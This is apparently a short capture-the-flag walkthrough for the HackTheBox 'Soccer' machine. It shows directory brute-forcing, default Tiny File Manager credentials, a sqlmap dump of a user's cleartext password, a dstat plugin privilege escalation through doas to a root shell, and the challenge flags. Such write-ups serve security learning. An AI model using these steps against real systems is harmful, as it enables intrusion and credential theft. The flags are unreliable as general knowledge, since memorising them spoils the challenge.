dirsearch -u http://soccer.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
[06:21:08] 301 -  178B  - /tiny  ->  http://soccer.htb/tiny/   
--------------------

Tiny File Manager
https://github.com/prasathmani/tinyfilemanager
Default username/password: admin/admin@123 and user/12345.\
--------------------
使用php revshells
--------------------
--------------------
http://soc-player.soccer.htb/check
--------------------

WebSocket sql
--------------------
sqlmap -u "http://localhost:8081/?id= 1 " --batch -D soccer_db -T accounts -C id,email,username,password --dump
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+
--------------------


╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                    
  Group player:                                                                                                      
/usr/local/share/dstat                                                                                               


參考
(1)https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-dstat-privilege-escalation/#2.-execute-dstat-with-the-malicious-plugin
(2)https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-dstat-privilege-escalation/


player@soccer:~$ nano /usr/local/share/dstat/dstat_exploit.py
player@soccer:~$ dstat --list | grep exploit
player@soccer:~$ doas -u root /usr/bin/dstat --exploit
player@soccer:~$ bash -p


--------------------
user flag 815927391bbd13c5bffb43e61582f97a
cline flag 3fad38ee9d130202023ce960e8fe10f3